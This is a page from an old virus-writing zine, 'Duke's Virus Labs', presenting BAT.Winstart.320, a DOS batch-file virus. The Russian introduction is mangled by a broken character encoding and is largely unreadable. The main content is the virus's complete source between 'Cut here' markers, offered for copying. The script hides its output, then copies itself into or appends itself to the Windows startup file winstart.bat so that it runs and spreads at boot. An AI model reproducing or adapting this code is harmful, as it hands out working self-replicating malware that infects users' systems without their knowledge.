- [Duke's Virus Labs #4] - [Page 13] -

BAT.Winstart.320
(c) by Duke/SMF

     : BAT.Winstart.320
         : Duke/SMF
 ண.   : DOS script :)
 ᮧ : 12.01.99

   訫  㯠  ன ࠤ樨   ⮬  ⠪  ࠤ
⥫ ᢥ BAT-ᮬ.   ࠧ     쪨 ࠧ஬,
 ਢ ਠ樨  ⥬ ࠦ 䠩 WINSTART.BAT.  ⭮,
 䠩 믮 Windows'  㧪 ⥬ (᫨ ,  
WINSTART.BAT, ). ⮯  ⭮ ࠭ :
%windir%\winstart.bat .  ,    ⮫쪮  ⮬ 䠩 
᪨ ६   .  ⮬  ஢  
ࠦ,   ⢨  - ᮧ  ;)

===== Cut here =====
:YYY
@ctty nul
if "%windir%==" goto clo
set f=%windir%\winstart.bat
if %0==%f% goto clo
if not exist %f% goto typ
type 1>z1
type 2>z2
type 3>z3
echo :NNN>>%f%
del z? /p<%f%
if exist z? goto zar
goto clo
:BAT.Winstart (c) by Duke/SMF
:zar
del z?
type %0>>%f%
goto clo
:typ
type %0>%f%
:clo
ctty con
===== Cut here =====
